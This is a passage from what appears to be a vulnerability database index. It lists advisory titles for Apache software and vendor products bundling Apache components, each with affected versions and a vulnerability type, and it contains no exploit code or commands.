| [108244] Oracle Transportation Management 6.4.1/6.4.2 Apache Commons FileUpload denial of service
| [108243] Oracle Agile Engineering Data Management 6.1.3/6.2.0 Apache Commons Collections memory corruption
| [108222] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Batik denial of service
| [108219] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat unknown vulnerability
| [108217] Oracle Retail Store Inventory Management 13.2.9/14.0.4/14.1.3/15.0.1/16.0.1 Apache Groovy unknown vulnerability
| [108216] Oracle Retail Convenience and Fuel POS Software 2.1.132 Apache Groovy unknown vulnerability
| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
| [108113] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Batik denial of service
| [108107] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
| [108102] Oracle Healthcare Master Person Index 4.x Apache Groovy unknown vulnerability
| [108085] Oracle Identity Manager 11.1.2.3.0 Apache Struts 1 memory corruption
| [108083] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
| [108080] Oracle GlassFish Server 3.1.2 Apache Commons FileUpload denial of service
| [108066] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Tomcat memory corruption
| [108062] Oracle BI Publisher 11.1.1.7.0/12.2.1.1.0/12.2.1.2.0 Apache ActiveMQ memory corruption
| [108060] Oracle Enterprise Manager Ops Center 12.2.2/12.3.2 Apache Groovy unknown vulnerability
| [108033] Oracle Primavera Unifier 9.13/9.14/10.x/15.x/16.x, Apache Groovy unknown vulnerability
| [108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy unknown vulnerability
| [108011] Oracle Communications Services Gatekeeper 5.1/6.0 Apache Trinidad unknown vulnerability
| [107904] Apache Struts up to 2.3.28 Double OGNL Evaluation privilege escalation
| [107860] Apache Solr up to 7.0 Apache Lucene RunExecutableListener XML External Entity
| [107834] Apache Ranger up to 0.6.1 Change Password privilege escalation
| [107639] Apache NiFi 1.4.0 XML External Entity
| [107606] Apache ZooKeper up to 3.4.9/3.5.2 Command CPU Exhaustion denial of service
| [107597] Apache Roller up to 5.0.2 XML-RPC Protocol Support XML External Entity
| [107429] Apache Impala up to 2.9.x Kudu Table privilege escalation
| [107411] Apache Tomcat up to 7.0.81/8.0.46/8.5.22/9.0.0 JSP File File Upload privilege escalation
| [107385] Apache Geode up to 1.2.0 Secure Mode privilege escalation
| [107339] Apache OpenNLP up to 1.5.3/1.6.0/1.7.2/1.8.1 XML Data XML External Entity
| [107333] Apache Wicket up to 8.0.0-M1 CSRF Prevention HTTP Header privilege escalation
| [107323] Apache Wicket 1.5.10/6.13.0 Class Request information disclosure
| [107310] Apache Geode up to 1.2.0 Command Line Utility Query privilege escalation
| [107276] ArcSight ESM/ArcSight ESM Express up to 6.9.1c Patch 3/6.11.0 Apache Tomcat Version information disclosure
| [107266] Apache Tika up to 1.12 XML Parser XML External Entity
| [107262] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
| [107258] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
| [107197] Apache Xerces Jelly Parser XML File XML External Entity
| [107193] ZTE NR8950 Apache Commons Collections RMI Request Deserialization privilege escalation
| [107084] Apache Struts up to 2.3.19 cross site scripting
| [106877] Apache Struts up to 2.0.33/2.5.10 Freemarker Tag privilege escalation
| [106875] Apache Struts up to 2.5.5 URL Validator denial of service
| [106874] Apache Struts up to 2.3.30 Convention Plugin directory traversal
| [106847] Apache Tomcat up to 7.0.80 VirtualDirContext Source information disclosure
| [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method Parameter File Upload privilege escalation
| [106777] Apache HTTP Server up to 2.2.34/2.4.27 Limit Directive ap_limit_section HTTP Request information disclosure
| [106739] puppetlabs-apache up to 1.11.0/2.0.x weak authentication
| [106720] Apache Wicket up to 1.5.12/6.18.x/7.0.0-M4 CryptoMapper privilege escalation
| [106586] Apache Brooklyn up to 0.9.x REST Server cross site scripting
| [106562] Apache Spark up to 2.1.1 Launcher API Deserialization privilege escalation
| [106559] Apache Brooklyn up to 0.9.x SnakeYAML YAML Data Java privilege escalation
| [106558] Apache Brooklyn up to 0.9.x REST Server cross site request forgery
| [106556] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
| [106555] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
| [106171] Apache Directory LDAP API up to 1.0.0-M30 Timing unknown vulnerability
| [106167] Apache Struts up to 2.5.12 REST Plugin XML Data privilege escalation
| [106166] Apache Struts up to 2.3.33/2.5.12 REST Plugin denial of service
| [106165] Apache Struts up to 2.3.33/2.5.12 URLValidator Regex CPU Exhaustion denial of service
| [106115] Apache Hadoop up to 2.6.4/2.7.2 YARN NodeManager Password information disclosure
| [106012] Apache Solr up to 5.5.3/6.4.0 Replication directory traversal
| [105980] Apache Engine 16.11.01 Parameter Reflected unknown vulnerability
| [105962] Apache Atlas 0.6.0/0.7.0 Frame cross site scripting
| [105961] Apache Atlas 0.6.0/0.7.0 Stack Trace information disclosure
| [105960] Apache Atlas 0.6.0/0.7.0 Search Reflected cross site scripting
| [105959] Apache Atlas 0.6.0/0.7.0 edit Tag DOM cross site scripting
| [105958] Apache Atlas 0.6.0/0.7.0 edit Tag Stored cross site scripting
| [105957] Apache Atlas 0.6.0/0.7.0 Cookie privilege escalation
| [105905] Apache Atlas 0.6.0/0.7.0/0.7.1 /js privilege escalation
| [105878] Apache Struts up to 2.3.24.0 privilege escalation
| [105682] Apache2Triad 1.5.4 phpsftpd/users.php Parameter cross site scripting
| [105681] Apache2Triad 1.5.4 phpsftpd/users.php Request cross site request forgery
| [105680] Apache2Triad 1.5.4 Parameter Session Fixation weak authentication
| [105643] Apache Pony Mail up to 0.8b weak authentication
| [105288] Apache Sling up to 2.3.21 Sling.evalString() String cross site scripting
| [105219] Apache Tomcat up to 8.5.15/9.0.0.M21 HTTP2 Bypass directory traversal
| [105218] Apache Tomcat up to 7.0.78/8.0.44/8.5.15/9.0.0.M21 CORS Filter Cache Poisoning privilege escalation
| [105215] Apache CXF up to 3.0.12/3.1.9 OAuth2 Hawk/JOSE MAC Validation Timing unknown vulnerability
| [105206] Apache CXF up to 3.0.11/3.1.8 JAX-RS Module XML External Entity
| [105205] Apache CXF up to 3.0.11/3.1.8 HTTP Transport Module Parameter cross site scripting
| [105202] Apache Storm 1.0.0/1.0.1/1.0.2/1.0.3/1.1.0 Worker privilege escalation
| [104987] Apache Xerces-C++ XML Service CPU Exhaustion denial of service
| [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy SOAP Request weak authentication
| [104985] Apache MyFaces Core up to 2.1.4 EL Expression Parameter Injection information disclosure
| [104983] Apache Wink up to 1.1.1 XML Document xxe privilege escalation
| [104981] Apache Commons Email 1.0/1.1/1.2/1.3/1.4 Subject Linebreak SMTP privilege escalation
| [104591] MEDHOST Document Management System Apache Solr Default Credentials weak authentication
| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
| [103995] Oracle 8.3/8.4/15.1/15.2 Apache Trinidad unknown vulnerability
| [103993] Oracle Policy Automation up to 12.2.3 Apache Commons FileUplaod denial of service
| [103916] Oracle Banking Platform 2.3/2.4/2.4.1/2.5 Apache Commons FileUpload denial of service
| [103906] Oracle Communications BRM 11.2.0.0.0 Apache Commons Collections privilege escalation
| [103904] Oracle Communications BRM 11.2.0.0.0/11.3.0.0.0 Apache Groovy memory corruption
| [103866] Oracle Transportation Management 6.1/6.2 Apache Webserver unknown vulnerability
| [103816] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Apache Commons Fileupload denial of service
| [103797] Oracle Tuxedo System and Applications Monitor Apache Commons Collections privilege escalation
| [103792] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Commons Fileupload privilege escalation
| [103791] Oracle Endeca Server 7.6.0.0/7.6.1.0 Apache Commons Collections privilege escalation
| [103788] Oracle Enterprise Repository 11.1.1.7.0/12.1.3.0.0 Apache ActiveMQ memory corruption
| [103787] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Groovy memory corruption
| [103763] Apache Sling up to 1.0.11 XSS Protection API XSS.getValidXML() Application XML External Entity
| [103762] Apache Sling up to 1.0.12 XSS Protection API XSSAPI.encodeForJSString() Script Tag cross site scripting
| [103693] Apache OpenMeetings 1.0.0 HTTP Method privilege escalation
| [103692] Apache OpenMeetings 1.0.0 Tomcat Error information disclosure
| [103691] Apache OpenMeetings 3.2.0 Parameter privilege escalation
| [103690] Apache OpenMeetings 1.0.0 sql injection
| [103689] Apache OpenMeetings 1.0.0 crossdomain.xml privilege escalation
| [103688] Apache OpenMeetings 1.0.0 weak encryption
| [103687] Apache OpenMeetings 1.0.0 cross site request forgery
| [103556] Apache Roller 5.1.0/5.1.1 Weblog Page Template VTL privilege escalation
| [103554] Apache OpenMeetings 1.0.0 Password Update unknown vulnerability
| [103553] Apache OpenMeetings 1.0.0 File Upload privilege escalation
| [103552] Apache OpenMeetings 3.2.0 Chat cross site scripting
| [103551] Apache OpenMeetings 3.1.0 XML unknown vulnerability
| [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption
| [103520] Apache HTTP Server up to 2.2.33/2.4.26 mod_auth_digest Authorization Header memory corruption
| [103519] Apache Struts up to 2.5.11/2.3.32 Spring AOP denial of service
| [103518] Apache Struts up to 2.5.11 URLValidator directory traversal
| [103492] Apache Spark up to 2.1.x Web UI Reflected cross site scripting
| [103401] Apache Struts 2.3.x Struts 1 Plugin ActionMessage privilege escalation
| [103399] Apache Traffic Control Traffic Router TCP Connection Slowloris denial of service
| [103387] Apache Impala up to 2.8.0 StatestoreSubscriber weak encryption
| [103386] Apache Impala up to 2.7.x/2.8.0 Kerberos weak authentication
| [103352] Apache Solr Node weak authentication
| [102897] Apache Ignite up to 2.0 Update Notifier information disclosure
| [102878] Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI privilege escalation
| [102698] Apache HTTP Server up to 2.2.32/2.4.25 mod_mime Content-Type memory corruption
| [102697] Apache HTTP Server 2.2.24/2.2.32 HTTP Strict Parsing ap_find_token Request Header memory corruption
| [102690] Apache HTTP Server up to 2.2.32/2.4.25 mod_ssl ap_hook_process_connection() denial of service
| [102689] Apache HTTP Server up to 2.2.32/2.4.25 ap_get_basic_auth_pw weak authentication
| [102622] Apache Thrift up to 0.9.2 Client Libraries skip denial of service
| [102538] Apache Ranger up to 0.7.0 Authorizer unknown vulnerability
| [102537] Apache Ranger up to 0.7.0 Wildcard Character unknown vulnerability
| [102536] Apache Ranger up to 0.6 Stored cross site scripting
| [102535] Apache Ranger up to 0.6.2 Policy Engine unknown vulnerability
| [102255] Apache NiFi up to 0.7.3/1.2.x Response Header privilege escalation
| [102254] Apache NiFi up to 0.7.3/1.2.x UI cross site scripting
| [102070] Apache CXF Fediz up to 1.1.2/1.2.0 Application Plugin denial of service
| [102020] Apache Tomcat up to 9.0.0.M1 Java Servlet HTTP Method unknown vulnerability
| [101858] Apache Hive up to 1.2.1/2.0.0 Client weak authentication
| [101802] Apache KNOX up to 0.11.0 WebHDFS privilege escalation
| [101928] HPE Aruba ClearPass Apache Tomcat information disclosure
| [101524] Apache Archiva up to 1.x/2.2.1 REST Endpoint cross site request forgery
| [101513] Apache jUDDI 3.1./3.1.2/3.1.3/3.1.4 Logout Open Redirect
| [101430] Apache CXF Fediz up to 1.3.1 OIDC Service cross site request forgery
| [101429] Apache CXF Fediz up to 1.2.3/1.3.1 Plugins cross site request forgery
| [100619] Apache Hadoop up to 2.6.x HDFS Servlet unknown vulnerability
| [100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting
| [100621] Adobe ColdFusion 10/11/2016 Apache BlazeDS Library Deserialization privilege escalation
| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
| [100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) information disclosure
| [100162] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Commons Collections privilege escalation
| [100160] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Trinidad unknown vulnerability
| [99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat memory corruption
| [99937] Apache Batik up to 1.8 privilege escalation
| [99936] Apache FOP up to 2.1 privilege escalation
| [99935] Apache CXF up to 3.0.12/3.1.10 STSClient Cache information disclosure
| [99934] Apache CXF up to 3.0.12/3.1.10 JAX-RS XML Security Streaming Client spoofing
| [99930] Apache Traffic Server up to 6.2.0 denial of service
| [99929] Apache Log4j up to 2.8.1 Socket Server Deserialization privilege escalation
| [99925] Apache Traffic Server 6.0.0/6.1.0/6.2.0 HPACK Bomb denial of service
| [99738] Ping Identity OpenID Connect Authentication Module up to 2.13 on Apache Mod_auth_openidc.c spoofing
| [117569] Apache Hadoop up to 2.7.3 privilege escalation
| [99591] Apache TomEE up to 1.7.3/7.0.0-M2 EjbObjectInputStream Serialized Object privilege escalation
| [99370] Apache Ignite up to 1.8 update-notifier Document XML External Entity
| [99299] Apache Geode up to 1.1.0 Pulse OQL Query privilege escalation
| [99572] Apache Tomcat up to 7.0.75/8.0.41/8.5.11/9.0.0.M17 Application Listener privilege escalation
| [99570] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP Connector Cache information disclosure
| [99569] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP/2 GOAWAY Frame Resource Exhaustion denial of service
| [99568] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 Pipelined Request information disclosure
| [99048] Apache Ambari up to 2.3.x REST API Shell Metacharacter privilege escalation
| [99014] Apache Camel Jackson/JacksonXML privilege escalation
| [98610] Apple macOS up to 10.12.3 apache_mod_php memory corruption
| [98609] Apple macOS up to 10.12.3 apache_mod_php denial of service
| [98608] Apple macOS up to 10.12.3 apache_mod_php memory corruption
| [98607] Apple macOS up to 10.12.3 apache_mod_php denial of service
| [98606] Apple macOS up to 10.12.3 apache_mod_php denial of service
| [98605] Apple macOS up to 10.12.3 Apache denial of service
| [98604] Apple macOS up to 10.12.3 Apache denial of service
| [98603] Apple macOS up to 10.12.3 Apache denial of service
| [98602] Apple macOS up to 10.12.3 Apache denial of service
| [98601] Apple macOS up to 10.12.3 Apache denial of service
| [98517] Apache POI up to 3.14 OOXML File XXE denial of service
| [98405] Apache Hadoop up to 0.23.10 privilege escalation
| [98199] Apache Camel Validation XML External Entity
| [97892] Apache Tomcat up to 9.0.0.M15 Reverse-Proxy Http11InputBuffer.java information disclosure
| [97617] Apache Camel camel-snakeyaml Deserialization privilege escalation
| [97602] Apache Camel camel-jackson/camel-jacksonxml CamelJacksonUnmarshalType privilege escalation
| [97732] Apache Struts up to 2.3.31/2.5.10 Jakarta Multipart Parser Content-Type privilege escalation
| [97466] mod_auth_openidc up to 2.1.5 on Apache weak authentication
| [97455] mod_auth_openidc up to 2.1.4 on Apache weak authentication
| [97081] Apache Tomcat HTTPS Request denial of service
| [97162] EMC OpenText Documentum D2 BeanShell/Apache Commons privilege escalation
| [96949] Hanwha Techwin Smart Security Manager up to 1.5 Redis/Apache Felix Gogo privilege escalation
| [96314] Apache Cordova up to 6.1.1 on Android weak authentication
| [95945] Apple macOS up to 10.12.2 apache_mod_php denial of service
| [95944] Apple macOS up to 10.12.2 apache_mod_php denial of service
| [95943] Apple macOS up to 10.12.2 apache_mod_php memory corruption
| [95666] Oracle FLEXCUBE Direct Banking 12.0.0/12.0.1/12.0.2/12.0.3 Apache Commons Collections privilege escalation
| [95455] Apache NiFi up to 1.0.0/1.1.0 Connection Details Dialogue cross site scripting
| [95311] Apache Storm UI Daemon privilege escalation
| [95291] ZoneMinder 1.30.0 Apache httpd privilege escalation
| [94800] Apache Wicket up to 1.5.16/6.24.x Deserialize DiskFileItem denial of service
| [94705] Apache Qpid Broker for Java up to 6.1.0 SCRAM-SHA-1/SCRAM-SHA-256 User information disclosure
| [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest Crash denial of service
| [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption
| [94625] Apache HTTP Server up to 2.4.24 Response Split privilege escalation
| [94540] Apache Tika 1.9 tika-server File information disclosure
| [94600] Apache ActiveMQ up to 5.14.1 Administration Console cross site scripting
| [94348] Apple macOS up to 10.12.1 apache_mod_php denial of service
| [94347] Apple macOS up to 10.12.1 apache_mod_php denial of service
| [94346] Apple macOS up to 10.12.1 apache_mod_php denial of service
| [94345] Apple macOS up to 10.12.1 apache_mod_php denial of service
| [94344] Apple macOS up to 10.12.1 apache_mod_php denial of service
| [94343] Apple macOS up to 10.12.1 apache_mod_php memory corruption
| [94342] Apple macOS up to 10.12.1 apache_mod_php memory corruption
| [94128] Apache Tomcat up to 9.0.0.M13 Error information disclosure
| [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c denial of service
| [93874] Apache Subversion up to 1.8.16/1.9.4 mod_dontdothat XXE denial of service
| [93855] Apache Hadoop up to 2.6.4/2.7.2 HDFS Service privilege escalation
| [93609] Apache OpenMeetings 3.1.0 RMI Registry privilege escalation
| [93555] Apache Tika 1.6-1.13 jmatio MATLAB File privilege escalation
| [93799] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
| [93798] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
| [93797] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 HTTP Split privilege escalation
| [93796] Apache Tomcat up to 8.5.6/9.0.0.M11 HTTP/2 Header Parser denial of service
| [93532] Apache Commons Collections Library Java privilege escalation
| [93210] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 ResourceLinkFactory privilege escalation
| [93209] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Realm Authentication User information disclosure
| [93208] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 System Property Replacement information disclosure
| [93207] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Utility Method privilege escalation
| [93206] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Configuration privilege escalation
| [93098] Apache Commons FileUpload privilege escalation
| [92987] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Commons Collection memory corruption
| [92986] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Tomcat memory corruption
| [92982] Oracle Insurance IStream 4.3.2 Apache Commons Collections memory corruption
| [92981] Oracle Financial Services Lending and Leasing 14.1.0/14.2.0 Apache Commons Collections memory corruption
| [92979] Oracle up to 8.0.3 Apache Commons Collections memory corruption
| [92977] Oracle FLEXCUBE Universal Banking up to 12.2.0 Apache Commons Collections memory corruption
| [92976] Oracle FLEXCUBE Universal Banking 12.87.1/12.87.2 Apache Commons Collections memory corruption
| [92975] Oracle FLEXCUBE Private Banking up to 12.1.0 Apache Commons Collections memory corruption
| [92974] Oracle FLEXCUBE Investor Servicing 12.0.1 Apache Commons Collections memory corruption
| [92973] Oracle 12.0.0/12.1.0 Apache Commons Collections memory corruption
| [92972] Oracle FLEXCUBE Core Banking 11.5.0.0.0/11.6.0.0.0 Apache Commons Collections memory corruption
| [92962] Oracle Agile PLM 9.3.4/9.3.5 Apache Commons Collections memory corruption
| [92909] Oracle Agile PLM 9.3.4/9.3.5 Apache Tomcat unknown vulnerability
| [92786] Oracle Banking Digital Experience 15.1 Apache Commons Collections information disclosure
| [92549] Apache Tomcat on Red Hat privilege escalation
| [92509] Apache Tomcat JK ISAPI Connector up to 1.2.41 jk_uri_worker_map.c memory corruption
| [92314] Apache MyFaces Trinidad up to 1.0.13/1.2.15/2.0.1/2.1.1 CoreResponseStateManager memory corruption
| [92313] Apache Struts2 up to 2.3.28/2.5.0 Action Name Cleanup cross site request forgery
| [92299] Apache Derby up to 10.12.1.0 SqlXmlUtil XML External Entity
| [92217] Apache ActiveMQ Artemis up to 1.3.x Broker/REST GetObject privilege escalation
| [92174] Apache Ranger up to 0.6.0 Policy cross site scripting
| [91831] Apache Jackrabbit up to 2.13.2 HTTP Header cross site request forgery
| [91825] Apache Zookeeper up to 3.4.8/3.5.2 C CLI Shell memory corruption
| [91818] Apache CXF Fediz up to 1.2.2/1.3.0 Application Plugin privilege escalation
| [92056] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92055] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92054] Apple macOS up to 10.11 apache_mod_php denial of service
| [92053] Apple macOS up to 10.11 apache_mod_php denial of service
| [92052] Apple macOS up to 10.11 apache_mod_php denial of service
| [92051] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92050] Apple macOS up to 10.11 apache_mod_php denial of service
| [92049] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92048] Apple macOS up to 10.11 apache_mod_php denial of service
| [92047] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92046] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92045] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92044] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92043] Apple macOS up to 10.11 apache_mod_php denial of service
| [92042] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92041] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92040] Apple macOS up to 10.11 Apache Proxy privilege escalation
| [91785] Apache Shiro up to 1.3.1 Servlet Filter privilege escalation
| [90879] Apache OpenMeetings up to 3.1.1 SWF Panel cross site scripting
| [90878] Apache Sentry up to 1.6.x Blacklist Filter reflect/reflect2/java_method privilege escalation
| [90610] Apache POI up to 3.13 XLSX2CSV Example OpenXML Document XML External Entity
| [90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console privilege escalation
| [90385] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site scripting
| [90384] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site request forgery
| [90383] Apache OpenOffice up to 4.1.2 Impress File memory corruption
| [89670] Apache Tomcat up to 8.5.4 CGI Servlet Environment Variable Open Redirect
| [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict Environment Variable Open Redirect
| [89726] Apple Mac OS X up to 10.11.5 apache_mod_php memory corruption
| [89484] Apache Qpid up to 0.13.0 on Windows Proton Library Certificate weak authentication
| [89473] HPE iMC PLAT/EAD/APM/iMC NTA/iMC BIMS/iMC UAM_TAM up to 7.2 Apache Commons Collections Library Command privilege escalation
| [90263] Apache Archiva Header denial of service
| [90262] Apache Archiva Deserialize privilege escalation
| [90261] Apache Archiva XML DTD Connection privilege escalation
| [88827] Apache Xerces-C++ up to 3.1.3 DTD Stack-Based memory corruption
| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
| [88608] Apache Struts up to 2.3.28.1/2.5.0 URLValidator Null Value denial of service
| [88607] Apache Struts up to 2.3.28.1 REST Plugin Expression privilege escalation
| [88606] Apache Struts up to 2.3.28.1 Restriction privilege escalation
| [88605] Apache Struts up to 2.3.28.1 Restriction privilege escalation
| [88604] Apache Struts up to 2.3.28.1 Token Validator cross site request forgery
| [88603] Apache Commons FileUpload up to 1.3.1 MultipartStream denial of service
| [88602] Apache Struts up to 1.3.10 ActionServlet.java cross site scripting
| [88601] Apache Struts up to 1.3.10 Multithreading ActionServlet.java memory corruption
| [88600] Apache Struts up to 1.3.10 MultiPageValidator privilege escalation
| [89005] Apache Qpid AMQP JMS Client getObject privilege escalation
| [87888] Apache Ranger up to 0.5.2 Policy Admin Tool eventTime sql injection
| [87835] Apache CloudStack up to 4.5.2.0/4.6.2.0/4.7.1.0/4.8.0.0 SAML-based Authentication privilege escalation
| [87806] HPE Discovery and Dependency Mapping Inventory up to 9.32 update 3 Apache Commons Collections Library privilege escalation
| [87805] HPE Universal CMDB up to 10.21 Apache Commons Collections Library privilege escalation
| [87768] Apache Shiro up to 1.2.4 Cipher Key privilege escalation
| [87765] Apache James Server 2.3.2 Command privilege escalation
| [88667] Apache HTTP Server up to 2.4.20 mod_http2 Certificate weak authentication
| [87718] Apache Struts up to 2.3.24.1 OGNL Caching denial of service
| [87717] Apache Struts up to 2.3.28 REST Plugin privilege escalation
| [87706] Apache Qpid Java up to 6.0.2 AMQP privilege escalation
| [87703] Apache Qbid Java up to 6.0.2 PlainSaslServer.java denial of service
| [87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation
| [87700] Apache PDFbox up to 1.8.11/2.0.0 XML Parser PDF Document XML External Entity
| [87679] HP Release Control 9.13/9.20/9.21 Apache Commons Collections Library Java Object privilege escalation
| [87540] Apache Ambari up to 2.2.0 File Browser View information disclosure
| [87433] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87432] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87431] Apple Mac OS X up to 10.11.4 apache_mod_php Format String
| [87430] Apple Mac OS X up to 10.11.4 apache_mod_php denial of service
| [87429] Apple Mac OS X up to 10.11.4 apache_mod_php information disclosure
| [87428] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87427] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87389] Apache Xerces C++ up to 3.1.3 XML Document DTDScanner.cpp memory corruption
| [87172] Adobe ColdFusion 11 Update 7/2016/up to 10 Update 18 Apache Commons Collections Library privilege escalation
| [87121] Apache Cordova iOS up to 3.x Plugin privilege escalation
| [87120] Apache Cordova iOS up to 3.x URL Whitelist privilege escalation
| [83806] HPE Network Node Manager i up to 10.01 Apache Commons Collections Library privilege escalation
| [83077] Apache Subversion up to 1.8.15/1.9.3 mod_authz_svn mod_authz_svn.c denial of service
| [83076] Apache Subversion up to 1.8.15/1.9.3 svnserve svnserve/cyrus_auth.c privilege escalation
| [82790] Apache Struts 2.0.0/2.3.24/2.3.28 Dynamic Method privilege escalation
| [82789] Apache Struts 2.0.0/2.3.24/2.3.28 XSLTResult privilege escalation
| [82725] HPE P9000 Command View up to 7.x/8.4.0 Apache Commons Collections Library privilege escalation
| [82444] Apache Camel up to 2.14.x/2.15.4/2.16.0 HTTP Request privilege escalation
| [82389] Apache Subversion up to 1.7.x/1.8.14/1.9.2 mod_dav_svn util.c memory corruption
| [82280] Apache Struts up to 1.7 JRE URLDecoder cross site scripting
| [82260] Apache OFBiz up to 12.04.05/13.07.02 Java Object privilege escalation
| [82259] Apache Qpid Proton up to 0.12.0 proton.reactor.Connector weak encryption
| [82250] Apache Ranger up to 0.5.0 Admin UI weak authentication
| [82214] Apache Wicket up to 1.5.14/6.21.x/7.1.x Input Element cross site scripting
| [82213] Apache Wicket up to 1.5.14/6.21.x/7.1.x ModalWindow Title getWindowOpenJavaScript cross site scripting
| [82212] Apache Ranger up to 0.5.0 Policy Admin Tool privilege escalation
11869| [82212] Apache Ranger up to 0.5.0 Policy Admin Tool privilege escalation
11870| [82211] Apache OFBiz up to 12.04.06/13.07.02 ModelFormField.java DisplayEntityField.getDescription cross site scripting
11871| [82082] Apache JetSpeed up to 2.3.0 User Manager Service privilege escalation
11872| [82081] Apache OpenMeetings up to 3.1.0 SOAP API information disclosure
11873| [82080] Apache OpenMeetings up to 3.1.0 Event cross site scripting
11874| [82078] Apache OpenMeetings up to 3.1.0 Import/Export System Backup ZIP Archive directory traversal
11875| [82077] Apache OpenMeetings up to 3.1.0 Password Reset sendHashByUser privilege escalation
11876| [82076] Apache Ranger up to 0.5.1 privilege escalation
11877| [82075] Apache JetSpeed up to 2.3.0 Portal cross site scripting
11878| [82074] Apache JetSpeed up to 2.3.0 cross site scripting
11879| [82073] Apache JetSpeed up to 2.3.0 User Manager Service sql injection
11880| [82072] Apache JetSpeed up to 2.3.0 Portal Site Manager ZIP Archive directory traversal
11881| [82058] Apache LDAP Studio/Directory Studio up to 2.0.0-M9 CSV Export privilege escalation
11882| [82053] Apache Ranger up to 0.4.x Policy Admin Tool privilege escalation
11883| [82052] Apache Ranger up to 0.4.x Policy Admin Tool HTTP Request cross site scripting
11884| [81696] Apache ActiveMQ up to 5.13.1 HTTP Header privilege escalation
11885| [81695] Apache Xerces-C up to 3.1.2 internal/XMLReader.cpp memory corruption
11886| [81622] HPE Asset Manager 9.40/9.41/9.50 Apache Commons Collections Library Java Object privilege escalation
11887| [81406] HPE Service Manager up to 9.35 P3/9.41 P1 Apache Commons Collections Library Command privilege escalation
11888| [81405] HPE Operations Orchestration up to 10.50 Apache Commons Collections Library Command privilege escalation
11889| [81427] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
11890| [81426] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
11891| [81372] Apache Struts up to 2.3.24.1 I18NInterceptor cross site scripting
11892| [81371] Apache Struts up to 2.3.24.1 Double OGNL Evaluation privilege escalation
11893| [81370] Apache Struts up to 2.3.24.1 Java URLDecoder cross site scripting
